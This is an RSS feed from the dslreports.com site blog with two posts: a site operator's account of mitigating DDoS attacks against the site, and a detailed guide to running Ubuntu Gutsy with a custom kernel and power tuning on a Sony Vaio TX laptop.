<?xml version="1.0" encoding="UTF-8"?>

<rss version="2.0"
 xmlns:blogChannel="http://backend.userland.com/blogChannelModule"
>

<channel>
<title>About dslreports.com</title>
<link>http://www.dslreports.com/blog/site</link>
<description>Random site news information and ponderings, by Justin</description>
<language>en</language>
<pubDate>Thu, 24 Apr 2008 04:14:40 EDT</pubDate>
<lastBuildDate>Thu, 24 Apr 2008 04:14:40 EDT</lastBuildDate>

<image>
<title>dslreports.com</title>
<url>http://i.dslr.net/bbrdisc1.gif</url>
<link>http://www.dslreports.com</link>
<width>19</width>
<height>18</height>
<description>bbr disc</description>
</image>
<item>
<title>Experiences with DDOS mitigation - Part I</title>
<description><![CDATA[<p>Over the last few weeks we have seen a number of distributed denial of service (ddos) attacks aimed at dslreports.com. Each attack lasted from an hour to 48 hours. Over two weeks the attacker experimented with larger and different methods. <br> <br>nac.net kindly provided me with a graph that shows one attack from their perspective. <br> <br>At 13:00 the excess traffic started, over 600mbit more than normal. It continued and reached a peak of 1.1 gigabit over normal at 7am the next morning, when it quickly ceased. <br> <br> att=1300592 <br> <br>From our perspective, the attack looked like this. The graph above is the high spike at the first thursday on this graph, reading from the right. <br> <br> att=1300593 <br> <br>The traffic rose at 13:00 on thursday until it quickly overwhelmed our port. When nac.net added two filters to block the traffic that was most easily identified as bad we regained some site function (the blue line is our traffic outbound). <br> <br>The next attack (the lump on the left of the graph above) started, perhaps coincidentally, at almost the same time and day of the subsequent week and lasted through to saturday afternoon, although we'd figured out how to block it well before it finished. The original filters were re-applied, and what was left was the TCP traffic (web server requests on port 80) alone. Those were the ones we had to deal with. <br> <br>The ddos originated from a botnet. (<a href="http://en.wikipedia.org/wiki/Botnet">wikipedia definition</a>). The first botnet was fairly small and located largely in Russia. The second botnet was much larger and was mainly out of several south east asian countries, as well as Russia and Poland. In the end we heard garbage traffic from well over 65,000 IPs that would otherwise never have reason to visit our little corner of the world. <br> <br>What is a botnet? 
<br> <br>It is estimated that there are hundreds and maybe thousands of (overlapping) groups of compromised PCs ready to do the bidding of a C&C (command and control) machine, or machines. Most if not all participants in the botnet are home ISP subscribers who have no clue that their PC is moonlighting for another employer (although they may wonder why their connection is slow, or their pc appears busy). <br> <br>A botnet can be small or huge: 100,000+ machines with no theoretical upper limit. The more botnet members connected to the net via broadband rather than dial-up, the more effective the net. The faster and more recent the PCs, the more effective the net. The more widely geographically distributed, the more effective the net. <br> <br>A botnet will employ a number of techniques aimed at resource exhaustion of a web site. If the botnet can request more resources than the target can deliver, then (and actually before that point) legitimate users are impacted via slow-downs and errors, and in the end the site just appears "down" or so slow as to be unusable. <br> <br>Resources can be exhausted in several ways: <br> <br>immediate compute resources of the target can be exhausted by heavy traffic in fragmented packets. These packets require CPU for re-assembly and so in theory with enough of this traffic the CPU(s) will become too busy to attend to everything else and incoming traffic will be dropped. A badly designed firewall may also operate inefficiently under load and exhaust compute resources well before the incoming bandwidth reaches maximum levels. <br> <br>memory resources can be exhausted by filling up various kernel tables that are not tuned to be sufficiently large. <br> <br>page production capacity can be exhausted simply by requesting so many pages that most pages fail to be produced or fetched in a reasonable enough time. <br> <br>bandwidth capacity can be exhausted simply by sheer quantity of arriving packets. 
Nearly every site has a fixed maximum bandwidth budget (even as simple as the number of ports they have live, times their maximum port speed). When bandwidth capacity is used, there is little else the site can do. The site also faces the possibility of being charged onerously for the period of excessive incoming bandwidth - although one hopes that a web host only does this if the ddos attacks become a common pattern for the unfortunate client. <br> <br>Defenses <br> <br>In the linux/apache world there are a number of different defenses floating around that claim to mitigate DDOS attacks. Do they work? well, I had plenty of time to experiment with all of them. <br> <br>1. Web server anti-ddos modules (protect only against TCP attacks) <br> <br><a href="http://www.zdziarski.com/projects/mod_evasive/">mod_evasive</a>, <a href="http://dominia.org/djao/limitipconn.html">mod_limitipconn</a>, etc, are only effective against a single or handful of attacking IPs. Their limitations derive from their attempt to respond in SOME way (an error response, rather than ignoring the IPs), and lack of information these modules have on the current activity of an IP or its past activity. If you are expecting these modules to provide attack insurance then re-evaluate because even a small botnet of say 100 machines can easily succeed. One particular form of attack: "open and hold", is particularly difficult to counter by program-based ddos prevention. Admins struggle to identify open and hold attackers (<a href="http://www.webhostingtalk.com/showthread.php?t=666591">see topics like this</a>) due to the limitation apache has in reporting the IP of a new and as yet uncompleted request. <br>In the last week another apache module has come to my attention: <a href="http://mod-qos.sourceforge.net/">mod_qos</a>. It appears to be much more ambitious. In particular I like that it tries to give priority to IP addresses it has already seen. (VIPs). 
Unfortunately mod_qos appears to be very "alpha" with almost nobody using it in production yet. If it is debugged it will be the best apache module to use. <br> <br>2. A better web server <br> <br>Apache is honestly not very good at large numbers of simultaneous connections. Although it CAN be <a href="http://www.stdlib.net/~colmmacc/Apachecon-EU2005/scaling-apache-handout.pdf">driven to support 27,000 connections</a>, it is a very uncomfortable situation to be handling. Lighttpd is better, but is single process / single thread. At this point I suspect that the Russian <a href="http://nginx.net/">nginx</a> webserver is the best: multiple processes, event driven - and is frugal with resources even with over 10,000 long lived connections. From the documentation I suspect it can easily break the 65k barrier. <br>By the way: you may wonder what is the point of handling so many concurrent connections, or such a high request rate? The reason is that it is much easier to identify "bad IPs" if they are allowed, at least for a short while, to go all the way through to requesting a URL, which means getting handled by a resilient web server, and getting logged. After getting logged the logs are analyzed (hopefully in near real-time) and it is usually easier to identify which IPs need to be blocked further upstream. Which brings us to... <br> <br>3. Netfilter (firewall) DROP rules <br> <br>The netfilter firewall is extremely flexible - but is not fast enough at evaluating each individual packet (or even just each incoming SYN packet) against a long (1000+) list of DROP rules. It is necessary to use some netfilter extensions for the more difficult task of recognizing and dropping SYN packets against a large list of bad hosts. <br> <br>4. Netfilter (firewall) extensions <br> <br>There are only two extensions worth anything for ddos attacks: ipt_hashlimit (comes in netfilter and the 2.6 kernel) and <a href="http://ipset.netfilter.org/">ipset</a>. 
Hashlimit helps in identifying IPs that have risen to the level of fast consumers, and ipset handles block-lists of up to 65535 IP addresses that can be queried, loaded and unloaded from user-space. In addition, a carefully designed netfilter firewall setup will drop known bad packets as a priority, before they can be connection tracked, or traverse all the other rules. Typically netfilter firewall example scripts have a default of DROP (this is done at the end of the rule chain): your list of rules decides what is accepted. The implications are obvious: bad packets traverse the entire firewall stack before being dropped. In a ddos, bad packets are the majority of packets you receive, so you want to decide right at the start that an origin IP address is no good, and move on. If your firewall is slow in processing all the incoming packets you will see drops recorded by the network card (see "6" below) under even a moderately sized attack. <br> <br>5. kernel tuning <br> <br>A number of kernel parameters should be increased or modified to help with extremely high request rates and tcp trouble. Generally where there is a maximum, it is increased. Where there is a timeout, it is decreased. Where there is a retry number, it is decreased! One frequent gotcha is netfilter connection tracking. If you must use connlimit (by virtue of other rules in your firewall), and you think it will be tracking packets from the botnet at least at the beginning before you have identified it, then make sure the connection tracking module it relies on (ip_conntrack) is loaded with a high hashsize (eg 256000), and then tuned for a high maximum number of tracked connections! <a href="http://www.google.com/search?q=ip_conntrack+table+full&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a">See the pleas for help when this table hits the limit</a>. <br> <br>6. network card <br> <br>Your network card should be a quality one, with the most recent stable driver available. 
Unless your card driver has NAPI support, it will interrupt as often as once for every packet arrival. <br> <br>During a ddos, your interface may get a LOT of very small packets per second. If your ethernet card driver has bugs or is inefficient, it may start to drop the packets. If your kernel is not able to process the packets quickly, the card will also show packet drops - but it will not be the fault of the driver or the card, it is instead the fault of your netfilter firewall rules (see "3" above). <br> <br>Interrupts of 50k per second are still ok, but beyond that you may want to use the card in NAPI mode (often requires a driver recompilation and rmmod/insmod). <br>Consider that small packets over a 100mbit interface might arrive at a rate of nearly 150k per second, or nearly 1.5m per second for a gig-e (a minimum-size ethernet frame occupies 84 bytes on the wire once preamble and inter-frame gap are counted)! <br>For what it is worth our experience was with the Intel e1000 card, and the current driver appears to be fairly efficient and does not crash under load. I did find an Intel research paper boasting of the increases in performance and decreases in cpu used by each of their driver releases under linux 2.6 (but now I can't find it again). <br> <br>7. Active mitigation <br> <br>It is vital to know during an attack what the hell is going on! You need to be able to quickly identify from logs what the most frequently hit URL is, you need to sort the most frequently attacking IPs by descending order over a small time horizon, you need to be able to tcpdump, and you need to review the request headers for clues as to fingerprints. Using simple pipelines or scripts operating on data such as web server logs, or the active hashlimit table (which is reported in real time in /proc), you can then produce lists of IPs to supplement your blacklist, or modify your server configuration to dump bad requests by picking up user-agent, headers, or other "tells". <br> <br>Note that the netstat command becomes worse than useless with large amounts of concurrent connections. 
Too slow to run, too cpu intensive. <br> <br>Are you prepared with some simple tools? If your blacklist contains over 10,000 IPs, do you have some scripts ready to review whether most are in a single class A or B space, or associated with a country? Do you have a database of class-B and class-C networks by country code ready? Using ipset to swap in a blocklist of networks that "turns off" entire countries can be a short-cut while you work out what else to do. Who knows, it might also give the attacker comfort that their attack is succeeding when in fact it is not. <br> <br>And most importantly of all, can you safely remotely access your network while the front-door is getting pounded down :) I heard that the Disney parks are built with employee-only tunnels linking everything. For good reason. <br> <br>8. upstream filtering <br> <br>A data center can help by at least applying filters for UDP and ICMP (if they are a large, by size, component of the attack) and these will be applied upstream from your port. They may also be able to arrange with you other more advanced filters either by trouble ticket, or even an API. But don't expect much. Proper DDOS mitigation is a costly service they have no interest in providing for free. <br> <br>9. black boxes <br> <br>The big names sell hardware advertised as being ddos resistant. I've no experience with them and I have to wonder whether lab tests and white papers substitute for real attacks. There are also some inline devices appearing that can be placed outside your firewall. I am (again) skeptical that these can be real set-and-forget solutions. The ultimate botnet looks exactly like real users making real requests. Whether there are any ultimate botnets out there yet is a different issue, but that is the aim for all of them. As they approach this perfection, a black box might increasingly start to issue false positives. 
You are in the best position to spot what a botnet is doing vs the habits of your real users and that needs eyeballs on logs. <br> <br>The other problem for hardware solutions is that you need a port (to the black box) that is larger than the largest attack. If an attack is 1.2 gig-e and your expensive purchased port is 1 gig-e, then real traffic is getting blocked no matter how good your anti-ddos hardware. <br> <br>10. Distributed content networks, Proxy services, etc. <br> <br>The big guys handle ddos mitigation with distributed capacity. Multiple IPs for a single DNS lookup. Specialized proxy front-ends by akamai and others that are written with capacity and ddos-resistance in mind. This is too expensive a proposition for second or third tier sites. A less expensive solution is an on-demand proxy service: in the event of a DDOS, DNS lookups for your domain are switched or automatically switch to a larger proxy server that is able to handle the attack, pick apart the legit requests, pass them to you, and throw away the rest. A service such as ProxyShield can apparently be available on hot standby for a sub $1000 fee per month, and when turned on cost only a few times more than that. If however your ddos attack is going to exceed 100mbit then the fees rise proportionally. <br> <br>11. Cutting off the botnet <br> <br>This would be the most satisfying, and we've done that before with the undercover help of friendly ISP network admins. The process is involved; you can compare it to getting a trace on a phone call before the phone is hung up. I think you have to assume that tracking down the command and control mechanism and taking it out is a pretty rare occurrence, so it is more like a lottery ticket than a solution to anything. <br> <br>12. Reporting the botnet <br> <br>If you have your wits about you there is one log that you need to keep or produce, and that is an accurately timestamped log of participating IPs. It can be as simple as UTC Time and IP address. 
It is important to try to keep false positives out, so the list should be combed for any prior-to-attack users of the website. There is undoubtedly a correct place, or places, to report such a list but right now I don't have that info handy. Perhaps someone in the comments can expand this point. Some ISPs will act on lists like these, but most will not. Expect absolutely no cooperation from ISPs based in most overseas countries but applaud any cooperation that does happen. <br> <br>Final Thoughts <br> <br>Our data-center believes that the best way to mitigate a DDOS attack is to "not piss people off". If you can be online and arrange your affairs so that you never piss anyone off then good luck to you. Unfortunately, however, botnets are getting cheap enough to build or rent that they will be deployed more frequently, and in retaliation for ever smaller disagreements. Supposedly gangs will also extort money to stop an attack. If you are in the online gambling business that might be the biggest risk. <br> <br>In my view the best defense is to simply be a harder target than average. Spending some time to make sure that a small attack has no effect will probably discourage bigger efforts and save you from running into the arms of an anti-ddos vendor the moment one person tries a few things to tie up your site! As a side-effect it will also probably make the site faster and more able to handle non-ddos "slashdot effects" as well. <br> <br>I'll update this article further if I can, and do a second one with more technical details that we have found effective.<br><a href="http://www.dslreports.com/shownews/Experiences-with-DDOS-mitigation-Part-I-93853">read comment(s)</a></p><br clear=all>]]></description>
<guid isPermaLink="true">http://www.dslreports.com/shownews/Experiences-with-DDOS-mitigation-Part-I-93853</guid>
<pubDate>Thu, 24 Apr 2008 04:14:40 EDT</pubDate>
</item>
<item>
<title>Ubuntu Gutsy on Sony TX series (TXN19P) - custom kernel, powertop optimized and all</title>
<description><![CDATA[<p>Help! I lost a week of my productive hours to Ubuntu. First it starts with downloading the LiveCD and booting it, then it becomes "I'll just try it in a partition" and finally you are chasing down minor tweak after minor tweak to get it almost, but never perfectly, "just right". <br> <br><div class="wiki"><h3>lspci, lsusb</h3></div> <br><div class="code"><pre><span class="codetext">
00:00.0 Host bridge: Intel Corporation Mobile 945GM/PM/GMS, 943/940GML and 945GT Express Memory Controller Hub (rev 03)
00:02.0 VGA compatible controller: Intel Corporation Mobile 945GM/GMS, 943/940GML Express Integrated Graphics Controller (rev 03)
00:02.1 Display controller: Intel Corporation Mobile 945GM/GMS/GME, 943/940GML Express Integrated Graphics Controller (rev 03)
00:1b.0 Audio device: Intel Corporation 82801G (ICH7 Family) High Definition Audio Controller (rev 02)
00:1c.0 PCI bridge: Intel Corporation 82801G (ICH7 Family) PCI Express Port 1 (rev 02)
00:1d.0 USB Controller: Intel Corporation 82801G (ICH7 Family) USB UHCI Controller #1 (rev 02)
00:1d.1 USB Controller: Intel Corporation 82801G (ICH7 Family) USB UHCI Controller #2 (rev 02)
00:1d.2 USB Controller: Intel Corporation 82801G (ICH7 Family) USB UHCI Controller #3 (rev 02)
00:1d.3 USB Controller: Intel Corporation 82801G (ICH7 Family) USB UHCI Controller #4 (rev 02)
00:1d.7 USB Controller: Intel Corporation 82801G (ICH7 Family) USB2 EHCI Controller (rev 02)
00:1e.0 PCI bridge: Intel Corporation 82801 Mobile PCI Bridge (rev e2)
00:1f.0 ISA bridge: Intel Corporation 82801GBM (ICH7-M) LPC Interface Bridge (rev 02)
00:1f.1 IDE interface: Intel Corporation 82801G (ICH7 Family) IDE Controller (rev 02)
00:1f.3 SMBus: Intel Corporation 82801G (ICH7 Family) SMBus Controller (rev 02)
02:00.0 Network controller: Intel Corporation PRO/Wireless 3945ABG Network Connection (rev 02)
06:04.0 CardBus bridge: Texas Instruments PCIxx12 Cardbus Controller
06:04.1 FireWire (IEEE 1394): Texas Instruments PCIxx12 OHCI Compliant IEEE 1394 Host Controller
06:04.2 Mass storage controller: Texas Instruments 5-in-1 Multimedia Card Reader (SD/MMC/MS/MS PRO/xD)
06:08.0 Ethernet controller: Intel Corporation PRO/100 VM Network Connection (rev 02)

Bus 005 Device 001: ID 0000:0000
Bus 004 Device 008: ID 044e:300c Alps Electric Co., Ltd
Bus 004 Device 001: ID 0000:0000
Bus 003 Device 008: ID 0483:2016 SGS Thomson Microelectronics Fingerprint Reader
Bus 003 Device 001: ID 0000:0000
Bus 002 Device 001: ID 0000:0000
Bus 001 Device 001: ID 0000:0000
</span></pre></div> <br><div class="wiki"><h3>What works etc..</h3></div> <br><b>What works out of the box</b> <br><small>Gutsy, actually, not Feisty, although Feisty was ok too</small> <br><blockquote>The HDD and DVD drive, of course <br>The video-subsystem including 24 bit deep native 1366x768 (use the intel driver but i810 works as well) <br>Wifi (ipw3945) and wpa_supplicant via gnome NetworkManager <br>Bluetooth <br>Sound (speakers and headphones) <br>Suspend to disk <br>Suspend to RAM <br>Texas 5-in-1 card reader (Gutsy also provides sony memory stick filesystem) <br>Screen brightness <br>PCMCIA cards (probably?) <br>USB port <br>Playing DVDs (using VLC) <br>3d graphics (glxgears 525fps, compiz etc) <br></blockquote> <br> <br><b>What can easily be made to work</b> <br><blockquote>Reasonable sony keys support <br><small>rmmod sonypi; modprobe sony_laptop .. edit the hotkeys startup script to avoid sonypi and use sony_laptop instead</small> <br>fan control via command line <br><small>again, provided by sony_laptop. 
The fan appears to be controlled by thermals so there is little point changing the speed manually</small> <br>Full synaptics/ALPs pad <br><small>requires some xorg.conf tweaking to enable synclient and/or to setup options to disable double-tap and so on</small> <br><small>you should have absolutely smooth motion, no halts or jumps</small> <br>Brightness control <br><small>the acpi brightness .sh script called by down/up brightness keys interprets brightness level 0 as "off" but there is no "off" utility (spicctrl), and brightness level 0 is actually available so we miss out on minimum brightness without echo 0 into the /proc file. This is also a filed bug in launchpad.</small> <br>56k intel_hda modem <br><small>I guess? haven't tried it</small> <br></blockquote> <br> <br><b>Not enabled</b> <br><blockquote> <br>Alt-Fn F10 - resolution expansion key <br><small>in addition, the AV keys apart from the green one, and the eject, do not generate events</small> <br></blockquote> <br> <br><b>Not ideal</b> <br><blockquote>An unlabeled Fn-F2 is connected to gnome volume mute and un-mute <br>the mute button works but does not generate any software events <br>the volume up/down buttons do not alert any software <br>the brightness up and down change isn't communicated to gnome brightness applet (which works, but gets confused as to the current brightness) <br>There is a TPM module for the TPM Infineon chip, but little docs for it <br>The brightness setting on this laptop is actually NINE steps (0 thru 8 inclusive). The sony_laptop module thinks hardware starts from 1, so it maps that to 0. The brightness modification hotkey script takes this mistake and compounds it, by mapping 0 to "off" (which is not possible on this vaio). By fixing both of these issues we regain all 9 levels of brightness and are able to use the two lowest settings that were previously blocked under default Ubuntu. 
<br></blockquote> <br> <br><b>What doesn't work</b> <br><blockquote>Fingerprint reader <br><small>The <i>thinkfinger</i> project explicitly says it is not for the vaio reader, it gives a CONNECT error</small> <br>Sprint EVDO WWAN <br><small>you can get it up as a usbserial device, but so far I haven't figured out how to use it</small> <br></blockquote> <br> <br><b>What works better than windows XP</b> <br><blockquote>The wifi association/dhcp lease renewal (was kind of flaky under XP) <br>suspend/resume (XP would disable the hibernate option after one use!) <br></blockquote> <br> <br><b>What doesn't work as well as XP</b> <br><blockquote>Power usage is 15% higher at full idle than XP. <br><small>still investigating this, some hardware must be left on by linux</small> <br>Kernel loses touch with disk, and file-system goes read-only after suspend/resume(?) <br><small>I noticed this on Gutsy, with my current config haven't seen it</small> <br>Turning off power to CDROM kills access to HDD <br><small>hald recognizes when the CDROM goes off and appears to screw up access to the HDD</small>  <br></blockquote> <br> <br><div class="wiki"><h3>NetworkManager</h3></div> <br>The stated aim of NetworkManager is to make networking "just work". It doesn't yet achieve this. I have noticed several issues. NetworkManager will sometimes SEGV and then enter an infinite cpu-using loop handling the signal. It has to be killed with -9 then restarted. The gnome nm-applet does not recognize when NetworkManager has gone berserk. Sometimes (through hibernate/resume or whatever) it gives up and wireless networking must be unchecked then re-checked before it wakes up, and finds the AP. The safest thing to do is to add to /etc/acpi/resume.d a script that will simply kill NetworkManager, and wpa_supplicant, then restart it fresh. The same thing needs to be done after hibernate (to disk) resumes. 
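<br> <br>As a rough illustration of the resume hook described above, here is a minimal sketch. It is not a tested Gutsy script: the NM_INIT path is my assumption about where the NetworkManager start script lives (adjust it for your release), and the DRY_RUN switch and the function names are made up for this example. By default it only prints what it would do.
<div class="code"><pre><span class="codetext">
```shell
#!/bin/sh
# Hypothetical resume hook: kill NetworkManager and wpa_supplicant, then start fresh.
# NM_INIT is an assumption; point it at whatever script starts NetworkManager on your release.
NM_INIT=${NM_INIT:-/etc/dbus-1/event.d/25NetworkManager}
# DRY_RUN=1 (the default here) only prints the commands; set DRY_RUN=0 to really run them.
DRY_RUN=${DRY_RUN:-1}

run() {
    if [ "$DRY_RUN" = "1" ]; then
        echo "would run: $*"
    else
        # ignore failures such as "no process found" so the later steps still run
        "$@" || true
    fi
}

restart_networking() {
    # -9 because a NetworkManager stuck in its signal loop will not respond to a normal kill
    run killall -9 NetworkManager
    run killall wpa_supplicant
    run "$NM_INIT" start
}

restart_networking
```
</span></pre></div>
Once the printed commands look right for your system, run it with DRY_RUN=0 from the resume directory, and hook the same script in wherever your setup runs commands after a hibernate (to disk) resume.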
<br> <br><div class="wiki"><h3>More on power management and power drain</h3></div> <br>Out of the box ubuntu doesn't offer many options for maximum battery life. hdparm is not set to enable power saving on the HDD. Even the screen blank option (turning off the panel) minimum setting is a long 10 minutes (you can use xset dpms to specify seconds if you want a shorter timeout). There is no GUI support for turning off bluetooth, setting wifi power saving, or disabling polling the CDROM drive. <br>I used the following link to get familiar with power saving: <br>&raquo;<A HREF="http://www.thinkwiki.org/wiki/How_to_reduce_power_consumption " >www.thinkwiki.org/wiki/How_to_re&middot;&middot;&middot;umption </A><br> <br><div class="wiki"><h3>Basic Tweaking</h3></div> <br>I played with the following for speed: <br>preload <br>readahead (including requesting a re-profile) <br>prelink <br>bootchart <br>In summary, preload is a daemon that attempts to do read-ahead for applications to improve startup time. readahead comes with Ubuntu but you can tune it (look at /etc/readahead/files, and reboot with 'profile' in the kernel command line to generate a new file list). Use bootchart to generate a PNG of your current boot that you can view with firefox to see if your last fix improved boot time or not. Prelink can be manually run, or run on all executables in the major directories, to improve their startup time. You can manually run it against firefox by prelinking firefox-bin but you will have to tell prelink where the firefox libraries are (they are in the same directory as firefox-bin). <br> <br><div class="wiki"><h3>Building a Custom Kernel on Gutsy</h3></div> <br>I decided to build a custom kernel. It provides more flexibility for this hardware. There were at least two kernel patches I was interested in. One allowed under-volting, which possibly allows lower power consumption, and the other, known as HPET (High Precision Event Timer), supposedly provides better CPU idling. 
<br>A third patch was to implement the "completely fair scheduling" which is just a Cool Thing if you want to do background compilations while still getting a responsive desktop. In addition I wanted to fix the errors I was having with the HDD that resulted from coming back from a suspend (or perhaps power-saving options). The ubuntu bug database appeared to indicate this may have been fixed in a kernel version beyond Gutsy. <br> <br>So I built a custom kernel starting with 2.6.22-14 with: <br>linux-phc-0.3.0 patch (patches acpi-cpufreq to allow undervolt) <br>patch-2.6.22-hrt6 patch (patches for better cpu idling) <br>sched-cfs-v2.6.22.9-v22 patch (patches for completely fair scheduling) <br>tuxonice patch (faster suspend to disk) <br> <br>HPET is activated according to the new boot log: <br><div class="code"><pre><span class="codetext">
&#91;   17.498633&#93; hpet clockevent registered
&#91;   17.498641&#93; hpet0: at MMIO 0xfed00000, IRQs 2, 8, 0
&#91;   17.498647&#93; hpet0: 3 64-bit timers, 14318180 Hz
</span></pre></div> <br>linux-phc is active if you have  <br><div class="code"><pre><span class="codetext">
/sys/devices/system/cpu/cpu0/cpufreq/phc_default_vids
/sys/devices/system/cpu/cpu0/cpufreq/phc_vids
</span></pre></div> <br>The only 'restricted driver' used by this laptop is ipw3945, and although there are instructions on how to compile it up, <i>you need to get the ubuntu modified version</i> because it fixes bugs in the 'upstream' version that, at least for this hardware, break NetworkManager / wpa_supplicant! I wasted a day fiddling around with wpa_supplicant and NetworkManager before figuring this out. The key breakthrough was a post ( &raquo;<small>https</small>://<A HREF="https://bugs.launchpad.net/ubuntu/+source/network-manager/+bug/128360/comments/10">bugs.launchpad.net/ubuntu/+sourc&middot;&middot;&middot;ments/10</A> ) explaining how to test wpa_supplicant with wpa_cli, and seeing that it didn't actually command the wifi device properly. 
<br> <br>I used the kernel build instructions in this topic, (post #2, not #1) <br> <br>&raquo;<A HREF="http://ubuntuforums.org/showthread.php?t=538068 " >ubuntuforums.org/showthread.php?t=538068 </A><br> <br>Since I wanted to apply multiple patch files, not just 1, there was more work to manually handle the .rej files. While the kernel was building I had to obtain the three different source files for the ipw3945 (daemon, driver and ucode) following roughly this explanation: <br>&raquo;<A HREF="http://ubuntuforums.org/showthread.php?t=294842 " >ubuntuforums.org/showthread.php?t=294842 </A><br>(if make fails with lots of errors try make SHELL=/bin/bash !) <br> <br>I did need to grab the current ubuntu patched version of ipw3945.c first, however, which the above link does not mention. There is a reason that modinfo reports ipw3945 in vanilla Gutsy or Feisty as "1.2.2d.ubuntu1" not "1.2.2d". The reason, and patch, is here: <br>&raquo;<A HREF="http://www.nabble.com/-PATCH--normalize-ipw3945-association-behaviour-t4401744.html " >www.nabble.com/-PATCH--normalize&middot;&middot;&middot;44.html </A><br>The ubuntu file is out there in ubuntu source repository land, and I can't find it right now. <br> <br>The .config file was based on the one provided in the forum howto above. I wanted to make sure powertop would work so I had to enable CONFIG_DEBUG_KERNEL. <br> <br>After bootup I made the 'ladder' kernel module load at boot by adding it to /etc/modules. 'menu' seemed buggy, it would lose track of the availability of the processor C3 state after the AC adapter went in then was removed again. 
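<br> <br>The checks mentioned in this section (the two phc files under cpufreq, and 'ladder' being listed in /etc/modules) can be sketched as a small script. This is only an illustration: the function names and the SYSFS_CPUFREQ / MODULES_FILE override variables are made up for this example, and it only tests for the presence of files and lines, not whether the patches actually behave.
<div class="code"><pre><span class="codetext">
```shell
#!/bin/sh
# Sketch: report whether the custom-kernel pieces described above look active.
# Both paths can be overridden so the checks can be tried against test directories.
SYSFS_CPUFREQ=${SYSFS_CPUFREQ:-/sys/devices/system/cpu/cpu0/cpufreq}
MODULES_FILE=${MODULES_FILE:-/etc/modules}

check_phc() {
    # linux-phc is active if both of these files exist
    if [ -e "$SYSFS_CPUFREQ/phc_default_vids" ]; then
        if [ -e "$SYSFS_CPUFREQ/phc_vids" ]; then
            echo "phc: active"
            return 0
        fi
    fi
    echo "phc: not found"
    return 1
}

check_ladder() {
    # 'ladder' should appear on a line of its own in the modules file
    if [ -r "$MODULES_FILE" ]; then
        if grep -qx "ladder" "$MODULES_FILE"; then
            echo "ladder: listed"
            return 0
        fi
    fi
    echo "ladder: not listed"
    return 1
}

check_phc || true
check_ladder || true
```
</span></pre></div>
Run it after booting the new kernel; a "not found" or "not listed" line simply tells you which step to revisit.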
<br> <br><div class="wiki"><h3>Using powertop and maximising battery life</h3></div> <br>In order to maximise battery life so that it would approach or match XP I had several aims: <br>* maximum power saving CPU state <br>* minimum number of interrupts per second <br>* maximum power saving state (or off state) for devices <br>* minimum disk activity <br>The following little collection of commands addresses this: <br><div class="code"><pre><span class="codetext">
echo 1500 &gt; /proc/sys/vm/dirty_writeback_centisecs
iwpriv eth1 set_power 2
hciconfig hci0 down &amp;&amp; rmmod hci_usb
echo 5 &gt; /proc/sys/vm/laptop_mode
echo performance &gt; /sys/devices/system/cpu/cpu0/cpufreq/scaling_governor
echo 3 &gt; /sys/class/backlight/sony/brightness
# ethtool -s eth0 wol d
# hdparm -B 1 -S 35 /dev/sda
echo 0 &gt; /sys/devices/platform/sony-laptop/bluetoothpower
#echo 0 &gt; /sys/devices/platform/sony-laptop/cdpower
echo 0 &gt; /sys/devices/platform/sony-laptop/fanspeed
hal-disable-polling --device /dev/scd0
xset s 120 120
</span></pre></div>Most of this is self-explanatory. I had to comment out powering down the cd drive because that seemed to destroy access to the HDD (they share the same IRQ). <br> <br>What you can't see here is that I also mount the drive using options 'noatime', and 'commit=30' as ext3 appears to want to write to the drive every 5 seconds if there is the slightest activity and this plays havoc with HDD sleep. You will also have to deal with syslogd wanting to write to a bunch of log files all the time if you want the drive to really spin down. <br> <br>Using powertop I also saw what had been reported by others: that X with 3d enabled seemed to generate an interrupt 60 times a second. So I edited xorg.conf and added Option "NoDRI" to the Device section for the chip. 
I also switched to the "intel" driver from the "i810" driver for no good reason I can yet find, other than that the "intel" driver appears to be newer. Even with NoDRI set, glxgears and compiz (ubuntu "desktop special effects") worked ok. <br> <br>Powertop also revealed that interrupts per second are jacked up by your AP wifi beacon frequency (which often defaults to 10 times a second - change it at your router), and by use of the ALPS/Synaptics pad, which generates 80 packets a second when you are touching the pad. Firefox contributes at least 10 a second, and some of the more continuous gnome widgets also generate some. <br> <br>Only by running in text mode with no graphical desktop could I make powertop go green and show a mere 5 interrupts per second. <br> <br>The Gutsy tickless kernel helps vs Feisty (the previous production ubuntu), and the HPET patch and the phc patch both appear to help some more (now I wish I'd kept stats at each stage). <br> <br><div class="wiki"><h3>Boot and shutdown time</h3></div><table align=left cellpadding=20><tr><td><div class="soft-tbl"><table cellspacing=1><tr><td>Mark</td><td>XP</td><td>Ubuntu 7.10</td></tr><tr><td>+9s</td><td>Grub menu</td><td>Grub menu</td></tr><tr><td>+14s</td><td>Splash</td><td>Splash</td></tr><tr><td>+29s</td><td>Cursor</td><td>Moving bar</td></tr><tr><td>+39s</td><td>Welcome</td><td>--</td></tr><tr><td>+44s</td><td>--</td><td>Cursor</td></tr><tr><td>+49s</td><td>XP Sound</td><td>--</td></tr><tr><td>+54s</td><td>--</td><td>login box</td></tr><tr><td>+59s</td><td>desktop</td><td>sound</td></tr><tr><td>+1m 9s</td><td>start firefox</td><td>--</td></tr><tr><td>+1m 14s</td><td>--</td><td>desktop</td></tr><tr><td>+1m 19s</td><td>--</td><td>start firefox</td></tr><tr><td>+1m 24s</td><td>--</td><td>firefox ready</td></tr><tr><td>+1m 55s</td><td>firefox ready</td><td>--</td></tr><tr><td>+15s</td><td>shutdown</td><td>shutdown</td></tr></table></div></td></tr></table>At first I thought that Ubuntu was much slower than Windows on booting up but 
impressions can be deceiving. Windows does a good job of <i>showing</i> you your desktop as fast as it can but you can't actually <i>use</i> it for a fair bit longer, and launching firefox asap incurs a huge delay, evidently because certain services are still being started up in the background. <br> <br>This XP install is fairly vanilla. No AV software or anything expensive put into auto-startup. Most of the stuff Sony threw in was removed or disabled. <br> <br>Ubuntu is up and multi-user earlier than XP, at about the 25 second mark after grub kicks it off, but takes longer to give you a fully functional desktop. Once the desktop appears, however, the machine is pretty much devoted to your needs so it is able to start firefox in just 5 seconds or so. <br> <br>In both XP and Ubuntu, the wifi network is up and available before you are able to use it. <br><br><br><br><br> <br><div class="wiki"><h3>Baselining Windows XP consumption</h3></div> <br>Analyzing XP power consumption was useful so I could aim Ubuntu at the same target. On an idle XP desktop, with maximum power saving and minimum brightness, XP allows the processor to stay in C3 over 98% of the time. With wifi off, XP is handling about 60 interrupts per second, and changes state out of C3 about 60 times per second. With movement on the touchpad, C0 rises to about 5% and C3 drops, while interrupts and context switches shoot up, but power usage does not rise that much. 
